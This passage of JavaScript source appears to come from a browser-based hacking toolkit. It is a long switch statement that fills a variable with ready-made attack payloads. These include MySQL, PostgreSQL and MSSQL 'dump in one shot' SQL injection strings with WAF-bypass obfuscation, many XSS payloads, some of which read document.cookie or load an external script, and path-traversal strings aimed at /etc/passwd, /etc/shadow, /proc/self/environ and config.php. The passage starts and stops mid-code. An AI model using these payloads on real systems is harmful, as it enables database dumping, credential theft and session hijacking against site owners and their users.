7353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)";
528.                     break;
529.             case '19':
530.                     txt = "concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a20416c69204b68616e2028416b446b292044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/";
531.                     break;
532.             case '20':  txt = "export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)";
533.                     break;
534.             case '21':  txt = "+and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+";
535.                     break;
536.             case '22':  txt = "concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e21212120416c69204b68616e202121213a3a3a3a3c666f6e7420636f6c6f723d626c75653e ,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)";
537.                     break;
538.             case '23':
539.                         txt = "(select+concat(0x3c666f6e7420666163653d43616d627269612073697a653d323e414c69204b48614e203a3a ,version(),0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x446174616261736573203a7e205b,(Select+count(Schema_name)from(information_Schema.schemata)),0x5d3c62723e5461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)),0x5d3c62723e436f6c756d6e73203a7e205b,(Select+count(column_name)from(information_Schema.columns)),0x5d3c62723e,@)from(select(@:=0x00),(@db:=0),(@db_nr:=0),(@tbl:=0),(@tbl_nr:=0),(@col_nr:=0),(select(@)from(information_Schema.columns)where(@)in(@:=concat(@,if((@db!=table_schema),concat((@tbl_nr:=0x00),0x3c666f6e7420636f6c6f723d7265643e,LPAD(@db_nr:=@db_nr%2b1,2,0x20),0x2e20,@db:=table_schema,0x2020202020203c666f6e7420636f6c6f723d707572706c653e207b205461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)where(table_schema=@db)),0x5d7d203c2f666f6e743e3c2f666f6e743e),0x00),if((@tbl!=table_name),concat((@col_nr:=0x00),0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD(@tbl_nr:=@tbl_nr%2b1,3,0x0b), 0x2e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a7e20205b,(Select+count(column_name)from(information_Schema.columns)where(table_name=@tbl)),0x5d202f203c666f6e7420636f6c6f723d626c61636b3e205265636f726473203a7e205b,(Select+ifnull(table_rows,0x30)+from+information_schema.tables+where+table_name=@tbl),0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e),0x00),concat(0x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD(@col_nr:=@col_nr%2b1,3,0x0b),0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e)))))x)";
540.                     break;
541.             case '24':
542.                         txt = "replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e3c666f6e7420636f6c6f723d7265643e263c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d707572706c653e273c2f666f6e743e3c666f6e7420636f6c6f723d7265643e,0x24,0x3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e3e416c69204b68616e3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@)";
543.                     break;
544.             case '25':
545.                     var dbName = prompt("Database Name","database()");
546.                     var dbNameFinal = "0x";
547.                     if(dbName == "database()"){dbNameFinal="database()";}
548.                     else{
549.                         // Convert DB name to hexa
550.                         for (var i = 0; i < dbName.length; i++){
551.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
552.                         }
553.                     }
554.                     txt = "(select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=" + dbNameFinal + ")and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)";
555.                     break;
556.             case '26':  txt = "(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)";
557.                     break;
558.             case '27':
559.                         txt = "(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)";
560.                     break;
561.             case '28':
562.                         txt = "(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))";
563.                     break;
564.             case '29':
565.                         txt = "(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)";
566.                     break;
567.                 /*PostgreSQL DIOS*/
568.             case '30':
569.                         txt = "(select+array_to_string(array_agg(concat(table_name,'::',column_name)::text),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$))";
570.                     break;
571.             case '31':
572.                         txt = "(select+string_agg(concat(table_name,'::',column_name),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$))";
573.                     break;
574.             case '32':
575.                         txt = "(select+array_to_string(array(select+table_name||':::'||column_name::text+from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)),'%3Cli%3E'))";
576.                     break;
577.                /*MSSQL DIOS*/
578.             case '33':
579.                         txt = ";begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ali Khan :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ali1 END--";
580.                     break;
581.             /*XSS Payoads by r0ot*/
582.             case '34':
583.                         txt = "<script>alert(1);</script>";
584.                     break;
585.             case '35':
586.                         txt = "<script>alert('XSS');</script>";
587.                     break;
588.             case '36':
589.                         txt = "<IMG SRC=javascript:alert(&quot;XSS&quot;)>";
590.                     break;
591.             case '37':
592.                         txt = "<IMG SRC=javascript:alert('XSS')>";
593.                     break;
594.             case '38':
595.                         txt = "<scr<script>ipt>alert('XSS');</scr</script>ipt>";
596.                     break;
597.             case '39':
598.                         txt = "'><script>alert(0)</script>";
599.                     break;
600.             case '40':
601.                         txt = "<img src=foo.png onerror=alert(/xssed/) />";
602.                     break;
603.             case '41':
604.                         txt = "<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>";
605.                     break;
606.             case '42':
607.                         txt = "<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>";
608.                     break;
609.             case '43':
610.                         txt = "<marquee><script>alert('XSS')</script></marquee>";
611.                     break;
612.             case '44':
613.                         txt = "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">";
614.                     break;
615.             case '45':
616.                         txt = "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">";
617.                     break;
618.             case '46':
619.                         txt = "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">";
620.                     break;
621.             case '47':
622.                         txt = "<script src=http://yoursite.com/your_files.js></script>";
623.                     break;
624.             case '48':
625.                         txt = "</title><script>alert(/xss/)</script>";
626.                     break;
627.             case '49':
628.                         txt = "</textarea><script>alert(/xss/)</script>";
629.                     break;
630.             case '50':
631.                         txt = "<IMG LOWSRC=\"javascript:alert('XSS')\">";
632.                     break;
633.             case '51':
634.                         txt = "<IMG DYNSRC=\"javascript:alert('XSS')\">";
635.                     break;
636.             case '52':
637.                         txt = "<font style='color:expression(alert(document.cookie))'>";
638.                     break;
639.             case '53':
640.                         txt = "<img src=javascript:alert('XSS')>";
641.                     break;
642.             case '54':
643.                         txt = "<script language=JavaScript>alert('XSS')</script>";
644.                     break;
645.             case '55':
646.                         txt = "<body onunload=javascript:alert('XSS');>";
647.                     break;
648.             case '56':
649.                         txt = "<body onLoad='alert('XSS');'";
650.                     break;
651.             case '57':
652.                         txt = "[color=red' onmouseover='alert('xss')']mouse over[/color]";
653.                     break;
654.             case '58':
655.                         txt = "'/></a></><img src=1.gif onerror=alert(1)>";
656.                     break;
657.             case '59':
658.                         txt = "window.alert('Bonjour !');";
659.                     break;
660.             case '60':
661.                         txt = "<div style='x:expression((window.r==1)?'':eval('r=1;";
662.                     break;
663.             case '61':
664.                         txt = "<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>";
665.                     break;
666.             case '62':
667.                         txt = "'>><marquee><h1>XSS</h1></marquee>";
668.                     break;
669.             case '63':
670.                         txt = "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">";
671.                     break;
672.             case '64':
673.                         txt = "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">";
674.                     break;
675.             case '65':
676.                         txt = "<script>var var = 1; alert(var)</script>";
677.                     break;
678.             case '66':
679.                         txt = "<STYLE type='text/css'>BODY{background:url('javascript:alert('XSS')')}</STYLE>";
680.                     break;
681.             case '67':
682.                         txt = "<?='<SCRIPT>alert('XSS')</SCRIPT>'?>";
683.                     break;
684.             case '68':
685.                         txt = "<IMG SRC='vbscript:msgbox(\"XSS\")'>";
686.                     break;
687.             case '69':
688.                         txt = "' onfocus=alert(document.domain) '> <'";
689.                     break;
690.             case '70':
691.                         txt = "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>";
692.                     break;
693.             case '71':
694.                         txt = "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS";
695.                     break;
696.             case '72':
697.                         txt = "[color=red width=expression(alert(123))][color]";
698.                     break;
699.             case '73':
700.                         txt = "<BASE HREF='javascript:alert('XSS');//'>";
701.                     break;
702.             case '74':
703.                         txt = "<br size=\"&{alert('XSS')}\">";
704.                     break;
705.             case '75':
706.                         txt = "<scrscriptipt>alert(1)</scrscriptipt>";
707.                     break;
708.             case '76':
709.                         txt = "</br style=a:expression(alert())>";
710.                     break;
711.             case '77':
712.                         txt = "</script><script>alert(1)</script>";
713.                     break;
714.             case '78':
715.                         txt = "'><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert('XSS')>";
716.                     break;
717.             case '79':
718.                         txt = "Execute(MsgBox(chr(88)&chr(83)&chr(83)))<";
719.                     break;
720.             case '80':
721.                         txt = "<body onLoad='while(true) alert('XSS');'>";
722.                     break;
723.             case '81':
724.                         txt = "''></title><script>alert(1111)</script>";
725.                     break;
726.             case '82':
727.                         txt = "</textarea>''><script>alert(document.cookie)</script>";
728.                     break;
729.             case '83':
730.                         txt = "data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=";
731.                     break;
732.             case '84':
733.                         txt = "/etc/passwd";
734.                     break;
735.             case '85':
736.                         txt = "///etc/passwd";
737.                     break;
738.             case '86':
739.                         txt = "../../../../../../../../../../../../etc/passwd";
740.                     break;
741.             case '87':
742.                         txt = "/etc/passwd%00";
743.                     break;
744.             case '88':
745.                         txt = "../../../../../../../../../../../../etc/passwd%00";
746.                     break;
747.             case '89':
748.                         txt = "\\\etc\passwd";
749.                     break;
750.             case '90':
751.                         txt = "..\..\..\..\..\..\..\..\..\..\etc\passwd";
752.                     break;
753.             case '91':
754.                         txt = "\etc\passwd%00";
755.                     break;
756.             case '92':
757.                         txt = "..\..\..\..\..\..\..\..\..\..\etc\passwd%00";
758.                     break;
759.             case '93':
760.                         txt = "//etc/passwd";
761.                     break;
762.             case '94':
763.                         txt = "....//....//....//....//....//....//....//....//....//....//etc/passwd";
764.                     break;
765.             case '95':
766.                         txt = "//etc/passwd%00";
767.                     break;
768.             case '96':
769.                         txt = "....//....//....//....//....//....//....//....//....//....//etc/passwd%00";
770.                     break;
771.             case '97':
772.                         txt = "///etc/hosts";
773.                     break;
774.             case '98':
775.                         txt = "../../../../../../../../../../../../etc/hosts";
776.                     break;
777.             case '99':
778.                         txt = "/etc/hosts%00";
779.                     break;
780.             case '100':
781.                         txt = "../../../../../../../../../../../../etc/hosts%00";
782.                     break;
783.             case '101':
784.                         txt = "///etc/shadow";
785.                     break;
786.             case '102':
787.                         txt = "../../../../../../../../../../../../etc/shadow";
788.                     break;
789.             case '103':
790.                         txt = "/etc/shadow%00";
791.                     break;
792.             case '104':
793.                         txt = "../../../../../../../../../../../../etc/shadow%00";
794.                     break;
795.             case '105':
796.                         txt = "..\%20\..\%20\..\%20\../etc/passwd%00";
797.                     break;
798.             case '106':
799.                         txt = "....//....//....//....//....//....//....//....//....//....//etc/hosts";
800.                     break;
801.             case '107':
802.                         txt = "....//....//....//....//....//....//....//....//....//....//etc/hosts%00";
803.                     break;
804.             case '108':
805.                         txt = "\etc\group%00";
806.                     break;
807.             case '109':
808.                         txt = "..\..\..\..\..\..\..\..\..\..\etc\group%00";
809.                     break;
810.             case '110':
811.                         txt = "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00";
812.                     break;
813.             case '111':
814.                         txt = "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00";
815.                     break;
816.             case '112':
817.                         txt = "..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00";
818.                     break;
819.             case '113':
820.                         txt = "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd%00";
821.                     break;
822.             case '114':
823.                         txt = "/../../../../../../../../../../etc/passwd^^%00";
824.                     break;
825.             case '115':
826.                         txt = "/../../../../../../../../../../etc/shadow^^%00";
827.                     break;
828.             case '116':
829.                         txt = "../\../\../\../\../\../\../\etc/\passwd%00";
830.                     break;
831.             case '117':
832.                         txt = "/./././././././././././etc/passwd%00";
833.                     break;
834.             case '118':
835.                         txt = "/./././././././././././etc/shadow%00";
836.                     break;
837.             case '119':
838.                         txt = "/./././././././././././etc/group%00";
839.                     break;
840.             case '120':
841.                         txt = "\.\.\.\.\.\.\.\.\etc\passwd%00";
842.                     break;
843.             case '121':
844.                         txt = "/%00//%00//%00//%00//%00/etc/passwd%00";
845.                     break;
846.             case '122':
847.                         txt = "/%00//%00//%00//%00//%00/etc/passwd%00";
848.                     break;
849.             case '123':
850.                         txt = "/%00//%00//%00//%00//%00//etc//shadow%00";
851.                     break;
852.             case '124':
853.                         txt = "/%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../%2e%2e\../etc/passwd%00";
854.                     break;
855.             case '125':
856.                         txt = "..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00";
857.                     break;
858.             case '126':
859.                         txt = "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00";
860.                     break;
861.             case '127':
862.                         txt = "..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd%00";
863.                     break;
864.             case '128':
865.                         txt = "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00";
866.                     break;
867.             case '129':
868.                         txt = "..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00";
869.                     break;
870.             case '130':
871.                         txt = "..//..//..//..//..//config.php%00";
872.                     break;
873.             case '131':
874.                         txt = "..\/..\/..\/..\/config.php%00";
875.                     break;
876.             case '132':
877.                         txt = "..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00";
878.                     break;
879.             case '133':
880.                         txt = "..%25%35%63..%25%35%63..%25%35%63config.php%00";
881.                     break;
882.             case '134':
883.                         txt = "///proc/self/environ";
884.                     break;
885.             case '135':
886.                         txt = "../../../proc/self/environ";
887.                     break;
888.             case '136':
889.                         txt = "/proc/self/environ%00";
890.                     break;
891.             case '137':
892.                         txt = "../../../proc/self/environ%00";
893.                     break;
894.             case '138':
895.                         txt = "../../../../../../../../../../../../proc/self/environ";
896.                     break;
897.             case '139':
898.                         txt = "../../../../../../../../../../../../proc/self/environ%00";
899.                     break;
900.             case '140':
901.                         txt = "(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)";
902.                     break;
903.             case '141':
904.                         txt = "concat/***/(0x223e3c2f7461626c653e3c2f6469763e3c2f613e3c666f6e7420636f6c6f723d677265656e3e3c62723e3c62723e3c62723e,0x3c666f6e7420666163653d63616d62726961207374796c653d726567756c61722073697a653d3320636f6c6f723d7265643e7e7e7e7e7e3a3a3a3a3a496e6a6563746564206279416c69204b68616e3a3a3a3a3a7e7e7e7e7e3c62723e3c666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,version(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e204461746162617365203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,database(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e2055736572203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,user(),0x3c62723e3c666f6e7420636f6c6f723d7265643e205461626c657320203c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e436f6c756d6e733c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e,@:=0,%28Select+count(*)from%28information_Schema.columns)where(table_schema=database())and@:=concat/**/(@,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,table_name,0x3c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a2020203c666f6e7420636f6c6f723d677265656e3e,column_name,0x3c2f666f6e743e)),@,0x3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e)";
905.                     break;
906.             case '142':
907.                         txt = "concat(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a626c75653b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e28496e6a656374656420627920416c69204b68616e293c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))";
908.                     break;
909.             case '143':
910.                         txt = "concat(0x3c666f6e7420636f6c6f723d7265643e496e6a656374656420427920416c69204b68616e,0x3c62723e,0x56657273696f6e3a3a,version(),0x3c62723e,0x746f74616c206e756d626572206f66204461746162617365733a3a,(select count(*) from information_schema.schemata),0x3c2f666f6e743e,0x3c62723e,0x746f74616c206e756d626572206f66205461626c65733a3a,@running_number:=(Select count(*)from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f536368656d61),0x3c62723e,0x746f74616c206e756d626572206f6620636f6c756d6e733a3a,(select count(*) from information_schema.columns ),0x3c62723e,0x636f756c6d6e732066726f6d205072696d6172792044617461626173653a3a,(select count(*) from information_schema.columns where table_Schema!=0x696e666f726d6174696f6e5f736368656d61),0x3c62723e,0x746f74616c20636f6c756d6e732066726f6d20736368656d613a3a,(select count(*) from information_schema.columns where table_Schema=0x696e666f726d6174696f6e5f736368656d61),@c:=0x00,if((select count(*) from information_schema.tables where table_schema=database() and @c:=concat(@c,0x3c62723e,lpad( 